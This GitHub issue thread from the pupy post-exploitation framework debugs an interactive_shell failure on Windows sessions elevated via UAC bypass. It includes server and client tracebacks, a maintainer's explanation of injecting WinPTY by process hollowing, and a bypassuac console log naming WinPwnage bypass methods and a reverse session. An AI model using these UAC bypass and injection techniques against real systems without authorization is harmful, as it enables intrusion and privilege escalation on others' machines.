### ISSUE TITLE
Module interactive_shell error

### ISSUE THREAD

**Issue by ibaka9** [n1nj4sec/pupy#749]
This is the server side error message:
```
[!] Load winpty failed: Exception: No module named security
[!] Error loading package winpty (winpty.pyo pkg=False) : No module named security Traceback (most recent call last):
ImportError: No module named security
[!] Load ptyshell failed: Exception: No module named security
[!] Error loading package ptyshell (ptyshell.pyo pkg=False) : No module named security Traceback (most recent call last):
ImportError: No module named security
2019-03-12 12:06:10,970| No module named security

========= Remote Traceback (1) =========
Traceback (most recent call last):
ImportError: No module named security
Traceback (most recent call last):
  File "/home/ubuntu/tools/pupy_new/pupy/pupy/pupylib/PupyJob.py", line 164, in module_worker
    module.run(self.args)
  File "/home/ubuntu/tools/pupy_new/pupy/pupy/modules/interactive_shell.py", line 72, in run
    acquire_shell = self.client.remote('ptyshell', 'acquire', False)
  File "/home/ubuntu/tools/pupy_new/pupy/pupy/pupylib/PupyClient.py", line 234, in remote
    remote_module = getattr(self.conn.modules, module)
  File "/home/ubuntu/tools/pupy_new/pupy/pupyw/local/lib/python2.7/site-packages/rpyc/core/netref.py", line 151, in __getattribute__
    return syncreq(self, consts.HANDLE_GETATTR, name)
  File "/home/ubuntu/tools/pupy_new/pupy/pupyw/local/lib/python2.7/site-packages/rpyc/core/netref.py", line 72, in syncreq
    return conn.sync_request(handler, oid, *args)
  File "/home/ubuntu/tools/pupy_new/pupy/pupy/network/lib/connection.py", line 387, in sync_request
    raise obj
ImportError: No module named security

========= Remote Traceback (1) =========
Traceback (most recent call last):
ImportError: No module named security

[-] No module named security

========= Remote Traceback (1) =========
Traceback (most recent call last):
ImportError: No module named security

```

This is the client side error message:
```
2019-03-12 12:19:12,967| Adding files: ['ptyshell.pyo', 'winpty.pyo']
2019-03-12 12:19:12,967| stream: send=12
2019-03-12 12:19:12,967| Wait for task to be queued(SyncQueue Dispatcher)
2019-03-12 12:19:13,016| Dispatch(PC:conn1) - data (29)
2019-03-12 12:19:13,016| Processing message request, type(PC:conn1): 4 seq: 64 - started
2019-03-12 12:19:13,016| Queue task
2019-03-12 12:19:13,017| Task queued
2019-03-12 12:19:13,017| Task acquired(SyncQueue Dispatcher)
2019-03-12 12:19:13,019| Find module: ptyshell/None/False
2019-03-12 12:19:13,020| [L] find_module(ptyshell,None) in ['ptyshell.pyo'])
2019-03-12 12:19:13,022| ptyshell found in "ptyshell.pyo" / size = 3781
2019-03-12 12:19:13,022| --> Loading ptyshell (ptyshell.pyo) package=False
2019-03-12 12:19:13,023| [L] ptyshell remove ptyshell.pyo from bundle / count = 308
2019-03-12 12:19:13,028| loading module ptyshell
2019-03-12 12:19:13,028| Load ptyshell from marshalled file (pyo)
2019-03-12 12:19:13,029| Find module: winpty/None/False
2019-03-12 12:19:13,029| [L] find_module(winpty,None) in ['winpty.pyo'])
2019-03-12 12:19:13,029| winpty found in "winpty.pyo" / size = 7240
2019-03-12 12:19:13,029| --> Loading winpty (winpty.pyo) package=False
2019-03-12 12:19:13,029| [L] winpty remove winpty.pyo from bundle / count = 307
2019-03-12 12:19:13,035| loading module winpty
2019-03-12 12:19:13,035| Load winpty from marshalled file (pyo)
2019-03-12 12:19:13,036| Find module: pupwinutils.security/None/False
2019-03-12 12:19:13,036| [L] find_module(pupwinutils.security,None) in [])
2019-03-12 12:19:13,036| pupwinutils.security not found in []: not in 0 files
2019-03-12 12:19:13,040| Async request(PC:conn1): 6
2019-03-12 12:19:13,040| stream: send=91
2019-03-12 12:19:13,042| Call remote_print_error() - error loading package winpty - start
2019-03-12 12:19:13,043| Async request(PC:conn1): 7
2019-03-12 12:19:13,043| stream: send=297
2019-03-12 12:19:13,043| Call remote_print_error() - error loading package winpty - complete
2019-03-12 12:19:13,048| Async request(PC:conn1): 8
2019-03-12 12:19:13,049| stream: send=93
2019-03-12 12:19:13,049| Call remote_print_error() - error loading package ptyshell - start
2019-03-12 12:19:13,049| Async request(PC:conn1): 9
2019-03-12 12:19:13,049| stream: send=409
2019-03-12 12:19:13,051| Call remote_print_error() - error loading package ptyshell - complete


```
Is this a bug of client?
Maybe it is about the privilege of client. I tried to run interactive_shell with System privilege and succeeded. But High privilege did not work.

**Comment by glides** [comment]
I tried to replicate and found that I can successfully get an interactive shell from med/high/system integrity levels under certain conditions.

Manually executing the client binary allows for a shell elevated and unelevated.
If you get system with the manually elevated client, I can get a shell from connection as well.

If I execute the client binary unelevated, and simply restart it as admin "bypassuac -r" I cannot get an interactive shell from that connection. And if I elevate to system from that client, I cannot get an interactive shell from there either. 

I have not been able to test other ways to elevate but figured that might be useful in troubleshooting.

**Comment by alxchk** [comment]
Well, something strange here. Can you try master from alxchk/pupy?
Also, please enable traceback:

`> pyexec -c 'import sys;  sys.tracebacklimit=20'`

and pupysh loggging

`>logging info`

Also try on fresh loaded client. Invoke just

`> shell`

**Comment by glides** [comment]
@alxchk 

I just pulled a fresh copy from alxchk/pupy and compiled the payload templates via docker. I get the same results. There is no additional output from pupysh while setting logging to info. Also, I tried typing just 'shell'

Sometimes the failed attempt would result in an error flashing in the console (pupysh). I managed to screenshot: https://imgur.com/a/7fllY3e

The other times an error msgbox would pop up on the client machine: https://imgur.com/a/k2Eu7Iq

Also, I confirmed this happens anytime I tried with a connection received from the bypassuac module (I'd specified the exe that I had just compiled instead of using powershell). Again, it works fine when you elevate the exe manually (right clicking and starting as admin)

**Comment by alxchk** [comment]
> compiled the payload templates via docker

This is not related to the issue, but be sure to update tc-windows (i.e. delete build-pupy-windows container, then pull alxchk/tc-windows).

>Sometimes the failed attempt would result in an error flashing in the console (pupysh). I managed to screenshot: https://imgur.com/a/7fllY3e

Well, this is another story.
Interactive shell works like this.  cmd.exe started, then WinPTY agent injected there, then pupy client establish connection to the agent using named pipes. WinPTY injected using hollowing. Hollowing implementation is not perfect (actually it's buggy and ugly). 
In your case something went wrong during memory manipulation. Rigtht now I don't export exact errors from the library, so it's hard to find out what exactly failed.

You can try to duplicate or migrate module after bypassuac, it may work then.

**Comment by glides** [comment]
> Also, what is the system and bypassuac method?

Windows 10. Bypass methods I've tested 2,4,10 and restart as admin. 

> You can try to duplicate or migrate module after bypassuac, it may work then.

Good suggestion; however, when attempting to `duplicate` the client machine pops-up with https://imgur.com/a/tbCgzyl and pupysh's output acts like nothing is wrong and that I should expect a new connect. This only happens to sessions created with bypassuac, again manually elevating grants the process the proper privs. 

I normally have other less triggery ways to elevate in a real-world scenario. Just thought I would try to reproduce the issue and found the behaviour to be odd. Am I using bypass methods on a target that's been patched? Pupy reports the sessions as High Integrity, but they are lacking some privs.

**Comment by ibaka9** [comment]
> > compiled the payload templates via docker
> 
> This is not related to the issue, but be sure to update tc-windows (i.e. delete build-pupy-windows container, then pull alxchk/tc-windows).
> 
> > Sometimes the failed attempt would result in an error flashing in the console (pupysh). I managed to screenshot: https://imgur.com/a/7fllY3e
> 
> Well, this is another story.
> Interactive shell works like this. cmd.exe started, then WinPTY agent injected there, then pupy client establish connection to the agent using named pipes. WinPTY injected using hollowing. Hollowing implementation is not perfect (actually it's buggy and ugly).
> In your case something went wrong during memory manipulation. Rigtht now I don't export exact errors from the library, so it's hard to find out what exactly failed.
> 
> You can try to duplicate or migrate module after bypassuac, it may work then.
> 
> Also, what is the system and bypassuac method?

OK, I tried master from alxchk/pupy. The shell work perfectly in every scenario which used to failed.

**Comment by glides** [comment]
@alxchk 

Updating WinPwnage to the latest resolves my issue and adds new bypasses. 
https://github.com/rootm0s/WinPwnage

**Comment by alxchk** [comment]
What bothers me, according to your screenshot there is some *issue* likely with hollowing which results in corrupted image..

**Comment by glides** [comment]
Using your branch and after updating WinPwnage, it's much more stable. I can consistently reproduce the issue using UAC bypass method 10. Using method 15 is super clean, method 4 leaves a prompt behind, but works.

When using method 10, I notice my session connects back before I get the notice my proc has spawn. This doesn't happen using the other working methods.

```
>> bypassuac -m 10 -e "C:\Users\x\Desktop\client_x64.exe"
[%] Using remote cmd (C:\Users\x\Desktop\client_x64.exe)
[%] Bypass uac could take few seconds, be patient...
[%] Attempting to run id (10) configured with payload (C:\Users\x\Desktop\client_x64.exe)
[+] Successfully created Default key containing payload (C:\Users\x\Desktop\client_x64.exe)
[+] Successfully created DelegateExecute key
[*] Session 4 opened (x@DEATHSTAR) (('10.0.0.75', 4444) <- 10.0.0.139:50790)
>> [%] Disabling file system redirection
[+] Successfully disabled file system redirection
[+] Successfully spawned process (C:\Users\upshaw\Desktop\client_x64.exe)
[+] Successfully cleaned up, enjoy!
>> sessions -i 4
[+] Default filter set to 4
>> shell
[+] Start new shell
[+] Shell closed

```

Let me know if I can assist. I agree something is corrupted, but it's somewhat inconsistent...appears partially functioning, and impacts more than just the shell module.

**Comment by alxchk** [comment]
Reproduced, will try to figure out what is there

**Comment by alxchk** [comment]
Well, it turns out to be a hard thing. Looks like ntdll loader behaves *differently* in this scenario. And I can't debug what is different =\

**Comment by alxchk** [comment]
I found the "reason" of this behaviour, but I can't fully understand it (yet). Meanwhile I submitted workaround. I'm not sure this will work from build to build, so if you can check on your systems (different Win10/Win7) - please do.
